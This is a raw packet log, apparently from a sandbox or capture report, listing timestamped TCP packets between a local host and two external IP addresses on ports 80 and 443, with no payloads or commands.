Sep 4, 2024 17:37:10.458290100 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458298922 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.458301067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458312988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458312988 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.458323002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458333015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458338976 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.458343983 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458353996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458358049 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.458364964 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458367109 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.458376884 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458388090 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.458410025 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.458739042 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458749056 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458758116 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458766937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458781958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.458792925 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.458874941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458885908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458900928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458909988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458920002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458930969 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.458937883 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.458939075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458945990 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.458950996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458960056 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458970070 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458972931 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.458980083 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458981991 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.458996058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458996058 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459007978 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459008932 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459018946 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459033966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459037066 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459045887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459049940 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459058046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459068060 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459074020 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459095001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459119081 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459573030 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459583998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459593058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459600925 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459609985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459610939 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459619999 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459620953 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459631920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459635019 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459641933 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459646940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459656954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459660053 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459666967 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459676027 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459680080 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459687948 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459697008 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459702969 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459707975 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459717989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459721088 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459728956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459739923 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459741116 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459752083 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459752083 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459764957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459774971 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459775925 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459784031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459799051 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459799051 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459806919 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459810019 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459822893 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.459831953 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459851980 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.459876060 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460336924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460347891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460356951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460361958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460371017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460381985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460391045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460391998 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460402012 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460412025 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460417986 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460421085 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460427999 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460432053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460441113 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460449934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460452080 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460467100 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460474968 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460479021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460494995 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460500002 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460500002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460514069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460520983 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460525036 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460530043 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460536003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460544109 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460551023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460557938 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460562944 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460571051 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460571051 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460577965 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460587978 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460592985 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460599899 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460603952 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460611105 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460618973 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460622072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460633039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460637093 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460644007 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460644007 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460654974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460664988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.460665941 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460686922 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.460707903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.461664915 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.461675882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.461707115 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.510174990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.510193110 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.510201931 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.510224104 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.510246038 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.510281086 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.510318995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.510432005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.510445118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.510454893 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.510477066 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.510488987 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.510574102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.510585070 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.510593891 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.510605097 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.510617018 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.510637045 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.510761976 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.510771990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.510780096 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.510790110 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.510799885 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.510816097 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.510824919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.510833025 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.510833025 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.510833025 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.510833979 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.510850906 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.510874033 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.511034012 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511044025 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511055946 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511080980 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.511086941 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511094093 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.511100054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511111021 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511120081 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511121988 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.511131048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.511131048 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511140108 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.511166096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.511471033 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511482954 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511492014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511501074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511509895 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511513948 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.511521101 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511523008 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.511548042 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.511677980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511687994 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511697054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511708021 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511712074 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.511719942 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511729956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511734009 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.511763096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.511775970 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.511837959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511847019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511856079 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511866093 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511874914 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511879921 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.511884928 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511898994 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.511914968 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511918068 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.511924028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511934996 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511945009 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511945009 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.511953115 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.511956930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511969090 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.511981964 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.511996984 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.512015104 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.512180090 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.512190104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.512223959 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.512295008 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.512304068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.512312889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.512322903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.512331963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.512335062 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.512343884 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.512355089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.512361050 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.512367010 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.512367010 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.512391090 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.512412071 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.512609959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.512622118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.512631893 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.512645006 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.512655020 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.512665033 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.512665987 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.512665987 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.512676954 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.512687922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.512687922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.512696981 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.512701035 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.512727976 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.512746096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.512990952 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513005972 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513014078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513024092 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513032913 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513034105 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513042927 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513042927 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513053894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513063908 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513065100 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513075113 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513078928 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513084888 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513092041 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513096094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513107061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513112068 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513118029 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513128996 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513138056 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513142109 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513143063 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513150930 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513154984 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513166904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513175964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513181925 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513190985 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513202906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513207912 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513207912 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513235092 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513490915 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513501883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513509989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513520956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513530016 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513530016 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513541937 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513550997 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513557911 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513560057 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513581038 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513596058 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513597012 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513608932 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513617039 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513627052 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513633013 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513637066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513648987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513650894 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513663054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513674021 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513676882 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513685942 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513695955 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513705969 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513708115 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513715029 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513719082 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513730049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513739109 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.513741970 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513750076 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.513771057 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.515213966 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.515234947 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.515275955 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.515286922 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.515295982 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.515321970 CEST	49727	443	192.168.2.6	158.69.225.124
